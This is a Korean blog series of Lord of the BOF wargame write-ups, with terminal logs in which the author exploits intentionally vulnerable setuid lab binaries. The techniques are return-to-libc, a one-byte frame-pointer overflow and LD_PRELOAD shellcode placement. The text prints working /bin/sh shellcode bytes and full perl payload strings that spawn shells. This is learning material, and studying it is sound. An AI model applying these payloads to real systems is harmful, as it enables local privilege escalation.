반응형

네, 

어..(충격먹음)

후...

어렵네여ㅎ..

로그가 좀 정신없으니 엔터로 정리해놓겠슴다.

이번에 풀면서 잡담나눠주시고 지식이랑 새로운 해낑기법들을 맛보게(?)해주시고 이해를 도와주신 popopret형께 감사드려요 :D [(http://netstat.tistory.com) ☜여러가지 자료가 엄청많은 짱짱블러그ㄱㄱ]

[bugbear@localhost bugbear]$ ls

assassas  core  ggggg  ggggg.c  giant  giant.c  grant  grant.c  grantz /*계속 복사본은 권한이 없어서 에러가 떠서 grantz로 연결하게 grant.c를 수정했는데 필요없는짓이었슴여.. 바꾸던 안바꾸던 execve의 주소는 같슴다..ㄸㄹㄹ*/


[bugbear@localhost bugbear]$ payload= [/bin//sh, "\x90" x40] [execve addr] [dummy x4] [/bin//sh] [&/bin//sh] [null]

[1] 807

bash2: [/bin//sh,: No such file or directory

bash2: /bin//sh]: No such file or directory

[1]+  Exit 127                payload= [/bin//sh, "\x90" x40] [execve addr] [dummy x4] [/bin//sh] [



[bugbear@localhost bugbear]$ vi whereis.c

[bugbear@localhost bugbear]$ gcc whereis.c -o whereis

whereis.c: In function `main':

whereis.c:5: warning: assignment makes pointer from integer without a cast


[bugbear@localhost bugbear]$ export BINSH=`perl -e 'print "/bin/sh"'`

[bugbear@localhost bugbear]$ ./whereis BINSH

the env is at: 0xbffffc75



[bugbear@localhost bugbear]$ payload= [binsh addr] [nullx4] [nopx36] [execve] [dummy] [binsh addr] [argv[1]addr] [null addr]

bash2: [binsh: command not found

[bugbear@localhost bugbear]$ ./grant "$(perl -e 'print "\x75\xfc\xff\xbf", "\x00"x4, "\x90"x36, "\x48\x9d\x0a\x40", "AAAA", "\x75\xfc\xff\xbf", "\xf8\xfb\xff\xbf", "0x51\xfb\xff\xbf"')"

You must use execve!

[bugbear@localhost bugbear]$ ./grant "$(perl -e 'print "\x75\xfc\xff\xbf", " "x4, "\x90"x36, "\x48\x9d\x0a\x40", "AAAA", "\x75\xfc\xff\xbf", "\xf8\xfb\xff\xbf", "0x51\xfb\xff\xbf"')"

uü ¿    H

@AAAAuü ¿øû ¿0x51û ¿

Segmentation fault (core dumped) /*여기서 체감한 사실: null은 argv[1]에 들어가지 않습니다. 허허*/

[bugbear@localhost bugbear]$ ./grant "$(perl -e 'print "\x75\xfc\xff\xbf", "\xff"x4, "\x90"x36, "\x48\x9d\x0a\x40", "AAAA", "\x75\xfc\xff\xbf", "\xf8\xfb\xff\xbf", "0x51\xfb\xff\xbf"')"

uü ¿    H

@AAAAuü ¿øû ¿0x51û ¿

Segmentation fault (core dumped)


[bugbear@localhost bugbear]$ gdb -q `perl -e 'print "\x75\xfc\xff\xbf"'` core

Core was generated by `./uü ¿ H

@AAAAuü ¿øû ¿0x51û ¿'. /*그래서 우선 지금은 argv[0]으로도 시도 해 봤는데 아직은 방법을 잘 모르겠는거 같아서 어제 p0p0pret 형이 알려주신 방법을 사용했습니다. (꼼수)*/

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0x41414141 in ?? ()

(gdb) b main

Breakpoint 1 at 0x8048566

(gdb) r

Starting program: /home/bugbear/uü ¿


Breakpoint 1, 0x8048566 in main ()

(gdb) p system

$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>

(gdb) q

The program is running.  Exit anyway? (y or n) y

[bugbear@localhost bugbear]$ ./`perl -e 'print "\x75\xfc\xff\xbf"'` "$(perl -e 'print "\x90"x44, "\x48\x9d\x0a\x40", "\xe0\x8a\x05\x40", "AAAA", "\x75\xfc\xff\xbf"')"

H

@@AAAAuü ¿

Segmentation fault (core dumped)


(중략...)


[bugbear@localhost bugbear]$ ./grant "$(perl -e 'print "\x90"x44, "\x48\x9d\x0a\x40", "\xe0\x8a\x05\x40", "\x75\xfc\xff\xbf", "\x78\xfc\xff\xbf"')"

H

@@uü ¿xü ¿

sh: =/bin/sh: No such file or directory

Segmentation fault (core dumped)

[bugbear@localhost bugbear]$ ./grant "$(perl -e 'print "\x90"x44, "\x48\x9d\x0a\x40", "\xe0\x8a\x05\x40", "\x75\xfc\xff\xbf", "\x79\xfc\xff\xbf"')"

H

@@uü ¿yü ¿

bash$ exit

exit

Segmentation fault (core dumped)

[bugbear@localhost bugbear]$ ./giant "$(perl -e 'print "\x90"x44, "\x48\x9d\x0a\x40", "\xe0\x8a\x05\x40", "\x75\xfc\xff\xbf", "\x79\xfc\xff\xbf"')"

H

@@uü ¿yü ¿

bash$ whoami

giant

bash$ my-pass

euid = 514


방법 설명: 원래 정석은 rtl로 execve에 인자를 다 전달해줌으로써 권한을 갖게 되는 거에여. 근데 rtl 기법을 봅시다.

[buffer] [sfp] [ret(function)] [dummy] [argument] [argument2] [argument3]... 이런 형식이 있다면

[nop~~~~~~][execve~~~~][system] [execve arg][system arg] -- 이 형태로 페이로드를 짜야 합니다.

이렇게 하면 execve함수를 호출하긴 하는데 인자가 제대로 없어서 실행은 성공적으로 되지 않습니다(원래 execve의 인자는 3개이지만 여기선 하나밖에 없습니다). 그래도 프로그램은 계속 실행해 원래는 더미(또는 exit)로 넣어두었던 곳의 ret를 참조하게 되는데요, 여기서 원래는 ret를 참조해 프로그램을 종료하게 되지만 이 페이로드의 경우에서는 종료되지 않고 system을 다시 호출하게 됩니다(ret자리에 system함수의 주소가 있으니까요). 그러면 또 system에 있는 인자를 system+4있는곳에서 찾게 될 것이구요. 그러면 system함수에 system함수의 인자(/bin/sh주소)까지 제대로 들어가 system("/bin/sh")를 실행하게 됩니다. 고로 결과는 쉘을 띄웁니다!(꼼수꼼수)


다른 풀이를 보니 음 으음 뭔지 이해는 되는거같은데 지금하기엔 어려운거같아요. 이해가 다 안되는데 한다는것도 그렇고,.. 계속 삽질해봐야겠네여.

반응형
저작자표시

'STUDY > Lord of the BOF' 카테고리의 다른 글

assassin->zombie_assassin  (0) 2014.05.13
giant->assassin  (0) 2014.04.22
darkknight->bugbear  (2) 2014.04.07
golem->darkknight  (0) 2014.04.06
skeleton->golem  (5) 2014.03.17
반응형

허헣

rtl풀리니까 기분좋네여. 좀 처음에 헤매긴 했는데 잘되서 기분좋습니다!

login: darkknight

Password:

Last login: Sun Mar 16 07:20:14 from 192.168.10.1

[darkknight@localhost darkknight]$ ls -al

total 44

drwx------    2 darkknig darkknig     4096 Mar 29  2010 .

drwxr-xr-x   25 root     root         4096 Mar 30  2010 ..

-rw-r--r--    1 darkknig darkknig       24 Mar  2  2010 .bash_logout

-rw-r--r--    1 darkknig darkknig      230 Mar  2  2010 .bash_profile

-rw-r--r--    1 darkknig darkknig      124 Mar  2  2010 .bashrc

-rwxr-xr-x    1 darkknig darkknig      333 Mar  2  2010 .emacs

-rw-r--r--    1 darkknig darkknig     3394 Mar  2  2010 .screenrc

-rwsr-sr-x    1 bugbear  bugbear     12043 Mar  8  2010 bugbear

-rw-r--r--    1 root     root          385 Mar 29  2010 bugbear.c

[darkknight@localhost darkknight]$ cat bugbear.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - bugbear

        - RTL1

*/


#include <stdio.h>

#include <stdlib.h>


main(int argc, char *argv[])

{

        char buffer[40];

        int i;


        if(argc < 2){

                printf("argv error\n");

                exit(0);

        }


        if(argv[1][47] == '\xbf') //이젠 아예 0xbf~주소를 못쓰게 됩니다.

        {

                printf("stack betrayed you!!\n");

                exit(0);

        }


        strcpy(buffer, argv[1]);

        printf("%s\n", buffer);

}

[darkknight@localhost darkknight]$ cp bugbear bugbeer

[darkknight@localhost darkknight]$ ./bugbeer `perl -e 'print "\x90"x48'`



Segmentation fault (core dumped)

[darkknight@localhost darkknight]$ gdb -q bugbeer core

Core was generated by `./bugbeer '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0x90909090 in ?? ()

(gdb) b main

Breakpoint 1 at 0x8048436

(gdb) r

Starting program: /home/darkknight/bugbeer


Breakpoint 1, 0x8048436 in main ()

(gdb) p system

$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>

(gdb) q

The program is running.  Exit anyway? (y or n) y

[darkknight@localhost darkknight]$ payload= nopx44, system, dummy, argument

bash: nopx44,: command not found

[darkknight@localhost darkknight]$ ./bugbeer `perl -e 'print "\x90"x44, "\xe0\x8a\x05\x40", "AAAA", "BBBB"'`

@AAAABBBB

Segmentation fault (core dumped)

[darkknight@localhost darkknight]$ export ARG=`perl -e 'print "\x90"x10, "/bin/sh"'`

[darkknight@localhost darkknight]$ ./env ARG

ARG: 0xbffffc9d

[darkknight@localhost darkknight]$ ./bugbeer `perl -e 'print "\x90"x44, "\xe0\x8a\x05\x40", "AAAA", "\x9d\xfc\xff\xbf"'`

@AAAAü ¿

sh: /bin/sh: No such file or directory

Segmentation fault (core dumped)

[darkknight@localhost darkknight]$ ./bugbeer `perl -e 'print "\x90"x44, "\xe0\x8a\x05\x40", "AAAA", "\x9e\xfc\xff\xbf"'`

@AAAAžü ¿

sh: /bin/sh: No such file or directory

Segmentation fault (core dumped) //쵸콤 게싱....해써요..ㅋ

[darkknight@localhost darkknight]$ ./bugbeer `perl -e 'print "\x90"x44, "\xe0\x8a\x05\x40", "AAAA", "\x9f\xfc\xff\xbf"'`

@AAAAŸü ¿

bash$ exit

exit

Segmentation fault (core dumped)

[darkknight@localhost darkknight]$ ./bugbear `perl -e 'print "\x90"x44, "\xe0\x8a\x05\x40", "AAAA", "\x9f\xfc\xff\xbf"'`

@AAAAŸü ¿

bash$ my-pass

euid = 513


와앙ㅇ와앎ㄴㅇㄹㅁㅇㄴㄹㅋㅋ

반응형
저작자표시

'STUDY > Lord of the BOF' 카테고리의 다른 글

giant->assassin  (0) 2014.04.22
bugbear->giant(1)  (0) 2014.04.16
golem->darkknight  (0) 2014.04.06
skeleton->golem  (5) 2014.03.17
vampire->skeleton  (2) 2014.02.25
반응형

와나..

http://research.hackerschool.org/Datas/Research_Lecture/sfp.txt

이거 읽으세요. 바로 이해감.

와...

와ㅏ...

밤샌 보람이 있는데요?!

/*

        The Lord of the BOF : The Fellowship of the BOF

        - darkknight

        - FPO

*/


#include <stdio.h>

#include <stdlib.h>


void problem_child(char *src)

{

        char buffer[40];

        strncpy(buffer, src, 41); /*strncpy(dest, source, #of bytes)- argv[1]에서 버퍼로 41바이트를 복사한다. 버퍼는 40바이트인데, 그래서 뒤에 있는 한 바이트가 이 함수에서 메인함수로 돌아갈 때 사용하는 스택프레임 포인터를 오버플로우하게 된다*/

        printf("%s\n", buffer);

}


main(int argc, char *argv[])

{

        if(argc<2){


                printf("argv error\n");

                exit(0);

        }


        problem_child(argv[1]);

}

[golem@localhost golem]$ ./porkknight `perl -e 'print "\x90\xfc\xff\xbf","\x90"x13, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\x86"x2'`

ü ¿j

                  X™Rh//shh/bin‰RS‰Í̀†ú ¿žMü ¿û ¿       @

Segmentation fault (core dumped)

[golem@localhost golem]$ gdb -q porkknight core

Core was generated by `./porkknight ü ¿j

                                                      X™Rh//shh/bin‰RS‰Í̀††'.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0xfc764000 in ?? ()

(gdb) x/40wx $esp

0xbffffa8e:     0xfaecbfff      0xd920bfff      0x43e04005      0xfab44001

0xbffffa9e:     0x6070bfff      0x69804006      0x85004010      0xfac40804

0xbffffaae:     0x81ecbfff      0xfaec4010      0x8466bfff      0x85000804

0xbffffabe:     0xfac40804      0xfc90bfff      0x9090bfff      0x90909090 //여기보면 argv[1]

0xbfffface:     0x90909090      0x6a909090      0x5299580b      0x732f2f68

0xbffffade:     0x622f6868      0xe3896e69      0xe1895352      0xfa8680cd

0xbffffaee:     0x849ebfff      0xfc4d0804      0xfb18bfff      0x09cbbfff

0xbffffafe:     0x00024003      0xfb440000      0xfb50bfff      0x3868bfff

0xbffffb0e:     0x00024001      0x83900000      0x00000804      0x83b10000

0xbffffb1e:     0x846c0804      0x00020804      0xfb440000      0x82e4bfff

(gdb) q

[golem@localhost golem]$ ./porkknight `perl -e 'print "\xc4\xfa\xff\xbf","\x90"x13, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\xc0"x2'`

úú ¿j

                  X™Rh//shh/bin‰RS‰Í̀úú ¿žMü ¿û ¿       @

Illegal instruction (core dumped)

[golem@localhost golem]$ gdb -q a.out core


warning: core file may not match specified executable file.

Core was generated by `./porkknight úú ¿j

                                                      X™Rh//shh/bin‰RS‰Í̀À'.

Program terminated with signal 4, Illegal instruction.

#0  0xbffffac4 in ?? ()

(gdb) z

[1]+  Stopped                 gdb -q a.out core

[golem@localhost golem]$ gdb -q porkknight core

Core was generated by `./porkknight úú ¿j

                                                      X™Rh//shh/bin‰RS‰Í̀À'.

Program terminated with signal 4, Illegal instruction.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0xbffffac4 in ?? ()

(gdb) x/40wx $esp

0xbffffac8:     0x90909090      0x90909090      0x90909090      0x580b6a90

0xbffffad8:     0x2f685299      0x6868732f      0x6e69622f      0x5352e389

0xbffffae8:     0x80cde189      0xbffffac0      0x0804849e      0xbffffc4d

0xbffffaf8:     0xbffffb18      0x400309cb      0x00000002      0xbffffb44

0xbffffb08:     0xbffffb50      0x40013868      0x00000002      0x08048390

0xbffffb18:     0x00000000      0x080483b1      0x0804846c      0x00000002

0xbffffb28:     0xbffffb44      0x080482e4      0x080484dc      0x4000ae60

0xbffffb38:     0xbffffb3c      0x40013e90      0x00000002      0xbffffc40

0xbffffb48:     0xbffffc4d      0x00000000      0xbffffc78      0xbffffc88

0xbffffb58:     0xbffffca0      0xbffffcbf      0xbffffce1      0xbffffcec

(gdb) q

[golem@localhost golem]$ ./porkknight `perl -e 'print "\xcb\xfa\xff\xbf","\x90"x13, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\xc0"x2'`

úú ¿j

                  X™Rh//shh/bin‰RS‰Í̀úú ¿žMü ¿û ¿       @

bash$ gjf

sh: gjf: command not found

bash$ exit

exit

[golem@localhost golem]$ ./darkknight `perl -e 'print "\xcb\xfa\xff\xbf","\x90"x13, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\xc0"x2'`

úú ¿j

                  X™Rh//shh/bin‰RS‰Í̀úú ¿žMü ¿û ¿       @

bash$ my-pass

euid = 512




이번에 하면서 노트테이킹한거:

 argv[1] = [one of the nopsled's addr] [nopsled] [shellcode] [the byte that overflows the fp]

 has to equal 41bytes


23byte(쉘코드) 4byte(argv[1] 주소) = 27byte

13byte(nop)


아무것도 안넣어도 segfault가 나서 왜인지 trace를 해보니 strncpy에서 그냥 쭉 계속 해서 나머지 쓰레기값을 넣고있어서 그런거였다.. 멍청멍청 똥멍청 strncpy


strace ./porkknight `perl -e 'print "AAAA"'` -i



노트테이킹한 종잌ㅋㅋㅋ 낙서가 많아보이는건 착각이구여 엄마가 후에 뭐가 이렇게 더럽냐며 버리심ㅋㅋㅋㅋㅋ

LeaveRet에서 후광이 나는군여 보이나여


기분좋네옇

이제 에세이를 써야되는데 2장더써야댐 망함 2시임 프린트도해야댐 망함

이 문제 처음에 막 fpo문서를 봐도 이해가 안가서 풀이를 봤는데도 이해 안가서 그냥 fpo문서 엄청 열심히 읽으니까 막 스택도 그려지고 ebp도 따라갈 수 있게되고 esp가 뭔짓을 하는지도 좀 그려지고 우왕아ㅓㅁㄹㄴㅇㄹ밍ㄹ 스택 늘어나느것도 보이고 leaveret이 뭐를 하는지도 그려지고 와 진짜 이번껀 좀 대박이었어요 그래서 결국 마지막엔 풀이 기억도 안나고 걍 제 힘으로 풀게됬네여 아 완전기분좋다

반응형
저작자표시

'STUDY > Lord of the BOF' 카테고리의 다른 글

bugbear->giant(1)  (0) 2014.04.16
darkknight->bugbear  (2) 2014.04.07
skeleton->golem  (5) 2014.03.17
vampire->skeleton  (2) 2014.02.25
troll->vampire  (0) 2013.12.22
반응형

..

..나는누구..?

...여긴어디....?


이번 문제(뿐만아니라 모든 문제들에)에 한줄기 빛을 떨궈준 cd80형에게 엄청난 감사를 표하는 바입니다.

그래도 LD_PRELOAD쓰는방법은 모름미다. 알거같은데 시도를 안해봤어여. 해봐야징.

[(http://cd80.tistory.com)☜☜ 엄청난 시스해커 블로그!클릭클릭] 


로그:

//소스를 처음에 봤는데 memset쪽이 뭔소린지 이해안가서 소스에따가 열씨미 주석달았습니다.

#include <stdio.h>

#include <stdlib.h>


extern char **environ; 


main(int argc, char *argv[])

{

char buffer[40];

int i;


if(argc < 2){

printf("argv error\n"); //아규멘트가 2 이하면 ㅂㅂ!! :D

exit(0);

}


if(argv[1][47] != '\xbf')

{

printf("stack is still your friend.\n"); //48번째는 \xbf

exit(0);

}


strcpy(buffer, argv[1]); 

printf("%s\n", buffer);


        // stack destroyer!

        memset(buffer, 0, 44); //버퍼의 44바이트를 뽀삼-buffer+sfp

memset(buffer+48, 0, 0xbfffffff - (int)(buffer+48));


/*그리고 리턴어드레스에 들어간 후의 것들도 파개

memset(source, data, amount of data)인데 0xbfffffff - (int)(buffer+48)란 뜻은 buffer+48부터 bfffffff까지의 거리만큼을 다 파괘한단 소리다 절망적이네 */

}


[skeleton@localhost skeleton]$ mkdir `perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f"'`

[skeleton@localhost skeleton]$ mkdir `perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f"'`

[skeleton@localhost skeleton]$ gcc -shared -fPIC asdf.c -o `perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`.so 

//여기서 쉘코드랑 놉썰매를 넣어여. 찾기 쉬워지거든여. 썰매도타공

[skeleton@localhost skeleton]$ export LD_PRELOAD=$PWD/`perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`.so 

//LD_PRELOAD에 쉘코드뭉치를 넣어요.

[skeleton@localhost skeleton]$ gdb -q nolam core

Core was generated by `                                                        '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /home/skeleton/j

                                     X™Rh//shh/bin‰RS‰Í̀.so...done.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0xbfbfbfbf in ?? ()

(gdb) q

[skeleton@localhost skeleton]$ ./nolam `perl -e 'print "\xbf"x48'`

¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿

Segmentation fault (core dumped)

[skeleton@localhost skeleton]$ gdb -q nolam core

Core was generated by `                                                        '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /home/skeleton/j

                                                                                                                                         X™Rh//shh/bin‰RS‰Í̀.so...done.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0xbfbfbfbf in ?? ()

(gdb) x/100wx 0xbfff0000

0xbfff0000:     Cannot access memory at address 0xbfff0000

(gdb) x/100wx 0xbffff000

0xbffff000:     0x000005c9      0x0000029f      0x000006a6      0x0000045f

0xbffff010:     0x000006dd      0x000004a6      0x00000000      0x00000620

0xbffff020:     0x0000051e      0x00000000      0x00000584      0x0000069c

[중략..]

0xbffff610:     0x6b732f65      0x74656c65      0x902f6e6f      0x90909090

0xbffff620:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffff630:     0x90909090      0x90909090      0x90909090      0x90909090

(gdb)

0xbffff640:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffff650:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffff660:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffff670:     0x90909090      0x90909090      0x90909090      0x6a909090

0xbffff680:     0x5299580b      0x732f2f68      0x622f6868      0xe3896e69

0xbffff690:     0xe1895352      0x732e80cd      0x4000006f      0x40013868

0xbffff6a0:     0x4000220c      0xbffffbd1      0x00000000      0x00000000

0xbffff6b0:     0x00000000      0x00000000      0x40014a00      0x00000000

0xbffff6c0:     0x00000000      0x00000000      0x00000000      0x00000006

0xbffff6d0:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffff6e0:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffff6f0:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffff700:     0x00000000      0x00000001      0x00000000      0x00000001

0xbffff710:     0xbffff608      0x00060000      0x00000000      0x00000000

(gdb) q

[skeleton@localhost skeleton]$ vi `perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`.c

[skeleton@localhost skeleton]$ gcc -shared -fPIC `perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`.c -o `perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`.so

[skeleton@localhost skeleton]$ export LD_PRELOAD=$PWD/`perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`.so

[skeleton@localhost skeleton]$ cat `perl -e 'print "\x90"x100, "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80"'`.c

#include<stdio.h>

int main()

{

printf ("wat do i do");

return 31337;

} //소스 뻘글돋네여

[skeleton@localhost skeleton]$ ./nolam `perl -e 'print "\xbf"x48'`

¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿

Segmentation fault (core dumped)

[skeleton@localhost skeleton]$ gdb -q nolam core

Core was generated by `                                                        '.

Program terminated with signal 11, Segmentation fault.

Reading symbols from /home/skeleton/j

                                                                                                                                         X™Rh//shh/bin‰RS‰Í̀.so...done.

Reading symbols from /lib/libc.so.6...done.

Reading symbols from /lib/ld-linux.so.2...done.

#0  0xbfbfbfbf in ?? ()

(gdb) x/100wx 0xbfff0000

0xbfff0000:     Cannot access memory at address 0xbfff0000

(gdb)

0xbfff0004:     Cannot access memory at address 0xbfff0004

(gdb) x/100wx 0xbfff5000

0xbfff5000:     Cannot access memory at address 0xbfff5000

(gdb) x/100wx 0xbfff9000

0xbfff9000:     Cannot access memory at address 0xbfff9000

(gdb) x/100wx 0xbfffb000

0xbfffb000:     Cannot access memory at address 0xbfffb000

(gdb) x/100wx 0xbfffd000

0xbfffd000:     Cannot access memory at address 0xbfffd000

(gdb) x/100wx 0xbffff000 //일케 하나하나 스택을 올라감미다

0xbffff000:     0x000005c9      0x0000029f      0x000006a6      0x0000045f

0xbffff010:     0x000006dd      0x000004a6      0x00000000      0x00000620

0xbffff020:     0x0000051e      0x00000000      0x00000584      0x0000069c

0xbffff030:     0x00000716      0x0000054d      0x00000527      0x000004ed

0xbffff040:     0x000003a1      0x00000458      0x00000466      0x0000063f

0xbffff050:     0x00000000      0x000001ca      0x00000000      0x0000027f

[중략..]

0xbffff600:     0x6b732f65      0x74656c65      0x902f6e6f      0x90909090

0xbffff610:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffff620:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffff630:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffff640:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffff650:     0x90909090      0x90909090      0x90909090      0x90909090

0xbffff660:     0x90909090      0x90909090      0x90909090      0x6a909090

0xbffff670:     0x5299580b      0x732f2f68      0x622f6868      0xe3896e69

0xbffff680:     0xe1895352      0x732e80cd      0x4000006f      0x40013868

0xbffff690:     0x4000220c      0xbffffbbc      0x00000000      0x00000000

0xbffff6a0:     0x00000000      0x00000000      0x40014a00      0x00000000

0xbffff6b0:     0x00000000      0x00000000      0x00000000      0x00000006

0xbffff6c0:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffff6d0:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffff6e0:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffff6f0:     0x00000000      0x00000001      0x00000000      0x00000001

0xbffff700:     0xbffff5f8      0x00060000      0x00000000      0x00000000

0xbffff710:     0x00000000      0x00000001      0x00000000      0x00000000

0xbffff720:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffff730:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffff740:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffff750:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffff760:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffff770:     0x00000000      0x00000000      0x00000000      0x00000000

0xbffff780:     0x00000000      0x00000000      0x00000000      0x00000000

(gdb) q

The program is running.  Exit anyway? (y or n) y

[skeleton@localhost skeleton]$ ./nolam `perl -e 'print "\x90"x44, "\x10\xf6\xff\xbf"'`

ö ¿

bash$ q

sh: q: command not found

bash$ exit

exit

[skeleton@localhost skeleton]$ ./golem `perl -e 'print "\x90"x44, "\x10\xf6\xff\xbf"'`

ö ¿

bash$ my-pass

euid = 511                                                                                                                                        


방식을 안 후에도 삽질을 많이 했는데, 처음엔 "막 뭐 소스의 함수를 후킹하라는건갘ㅋㅋㅋㅋ아닐텐뎈ㅋㅋ"이러며 웃고있다가 LD_PRELOAD는 환경변수잖아여. 그래서 쉐어드 라이브러리명만 쉘코드로 해놨더니 이게 동적링크인걸로 알고있는데 그래서 쉘코드 안떠서..는 뻥이고요 지금보니까 소중히 잘 들어있네 난 무슨뻘짓을 한거지. 

암튼 LD_PRELOAD란 공유라이브러리를 프로그램 실행전에 들고와서 스택에 고이고이 저장해둡니다. 찾아보니 그냥 스택에 찌꺼기가 남는다던데 그 이유는 뭔가 좀 복잡하다고 합니다. 그래서 음 그냥 공유라이브러리 파일명을 쉘코드로 하면 됬네여. 그렇네. ㅠ. 풀이 방법을 글로 읽기만 하고 시도해본거라 제가 했다고 할 수는 없지만 다음번에 또 써보고 싶은 기법이에여. 간지나잖아 처음에 코드보고 멘붕했는데 그것도 괜찮아진것 같고요 뭐 여러모로 멘붕이었지만 뿌듯하네요 횡설수설 잡담읽어주셔서 감사합니다. 배고프다. 모두들 안녕히주무세여 가정에 평화가 깃들기를

반응형
저작자표시

'STUDY > Lord of the BOF' 카테고리의 다른 글

darkknight->bugbear  (2) 2014.04.07
golem->darkknight  (0) 2014.04.06
vampire->skeleton  (2) 2014.02.25
troll->vampire  (0) 2013.12.22
orge->troll  (0) 2013.12.21
반응형

헠헠헠헠허커헣컿ㅋ헠ㅎ

내가 몇달동안 삽질하다가 아씨 나는 재능이업나보다 할 정도으 ㅣ문제였느데!!!!!!!!!!!!!!!!!

으헝ㄹㅁㄴㅇ럼ㄴ임ㄴㅇㄹ!!!!!!!!!!!!

풀렸쪙!!!!!!!!!!!!!!!

ㅇ름ㄴㄴㄹㄹㄹㄹㅁㄴㅇㄹ


쉘코드는 지난번에 사용한 2f없는것도 왠일로 안먹길래,, 그리고 2f들어가는거 심볼릭 링크로 하는거 배웠는데 손이랑 머리가 고자라 기억못해서  삽질끝에 풀이에서 가져왔어요. 쉘코드 출처:http://john-data.tistory.com/187

풀이는 안봤어요 히힣ㅎ히히히히히히 보려고도 했으나 엄청나게 설명이 많아서 그냥 다 때려치고 학교프로젝트도 때려치고 이것만 때려잡으려는찰나에 히히힣ㅎ히히히히히

잡담은 그만하고 정리한 로그 보여드릴께요.


//bash 2, ./ssssssss는 복사본.

[vampire@localhost vampire]$ ls

skeleton  skeleton.c

[vampire@localhost vampire]$ cat skeleton.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - skeleton

        - argv hunter

*/


#include <stdio.h>

#include <stdlib.h>


extern char **environ;


main(int argc, char *argv[])

{

        char buffer[40];

        int i, saved_argc;


        if(argc < 2){

                printf("argv error\n");

                exit(0);

        }


        // egghunter

        for(i=0; environ[i]; i++)

                memset(environ[i], 0, strlen(environ[i]));


        if(argv[1][47] != '\xbf')

        {

                printf("stack is still your friend.\n");

                exit(0);

        }


        // check the length of argument

        if(strlen(argv[1]) > 48){

                printf("argument is too long!\n");

                exit(0);

        }


        // argc saver

        saved_argc = argc;


        strcpy(buffer, argv[1]);

        printf("%s\n", buffer);


        // buffer hunter

        memset(buffer, 0, 40); //버퍼 사라짐


        // ultra argv hunter!

        for(i=0; i<saved_argc; i++)

                memset(argv[i], 0, strlen(argv[i])); //argv를 다 각각의 크기만큼을 0으로 덮어버림

}

